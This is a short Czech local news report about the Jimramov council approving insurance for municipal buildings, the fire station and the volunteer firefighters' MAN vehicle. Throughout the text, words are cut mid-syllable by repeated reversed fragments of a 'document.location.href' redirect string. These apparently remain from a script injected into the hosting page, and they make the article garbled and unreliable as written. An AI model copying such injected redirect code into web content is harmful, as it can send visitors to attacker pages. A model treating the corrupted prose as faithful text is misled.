Rainbow page separator

V Jimramově nechají pojistit některé obecní budovy

Neděle, 31. července 2016

Jimramov

Jimramov / Pojištění obecního majetku schválili jimramovští zastupitelé. Konkrétně se jedná o pojištění některých budov městyse, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože stav pojistek u těch, které ho již mají, už neodpovídá skutečnosti, případně nebyla pojistka uzavřená vůbec.
Zastupitelé se rovněž rozhodli navýšit pojistnou částku na jimramovskou hasičskou zbrojnici, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na celkem pět milionů korun z dosavadních dvou a půl milionu. Dále bylo vedením městyse schváleno uzavřít pojistnou smlouvu týkající se by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového domu v tamní ulici Ubušínská na částku sedm milionů korun.
Vedení Jimramova počítá také se sjednáním havarijního pojištění na au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobil značky Man, kterým disponují tamní dobrovolní hasiči.